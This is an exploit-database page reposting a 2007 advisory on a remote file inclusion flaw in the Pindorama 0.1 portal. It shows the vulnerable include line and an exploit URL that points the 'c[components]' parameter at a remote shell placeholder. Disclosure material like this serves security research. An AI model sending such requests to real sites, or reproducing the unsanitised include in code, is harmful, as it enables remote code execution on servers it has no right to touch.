header-logo
Suggest Exploit
vendor:
Pindorama
by:
S.W.A.T.
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Pindorama
Affected Version From: Pindorama 0.1
Affected Version To: Pindorama 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Pindorama 0.1 Remote File Inclusion

The Pindorama 0.1 portal is vulnerable to remote file inclusion. The vulnerability exists in the 'client.php' file of the 'xmlrpc' component. An attacker can exploit this vulnerability by injecting malicious code in the 'c[components]' parameter, leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Pindorama or apply necessary security measures to prevent unauthorized access to the 'client.php' file.
Source

Exploit-DB raw data:

                       \\\|///
                     \\  - -  //      Xmors Underground Group
                      (  @ @ )
               
               ----oOOo--(_)-oOOo--------------------------------------------------
               Portal   :  Pindorama 0.1
               Download :  http://downloads.sourceforge.net/pindorama/pindorama-0.1.zip
	       Author   :  S.W.A.T.
	       HomePage :  wWw.XmorS.CoM
	       Type     :  Remote File Inclusion
               Y! ID    :  Svvateam
               E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
               Dork     :   :( 
               
               ----ooooO-----Ooooo--------------------------------------------------
                   (   )     (   )
                    \ (       ) /
                     \_)     (_/



+---------------------------------------------------------------------------------------------+

Vuln Code :

require_once($c["components"]."xmlrpc/common.php");

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]


+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-11]

Navigation

Suggest Exploit

Services By CQR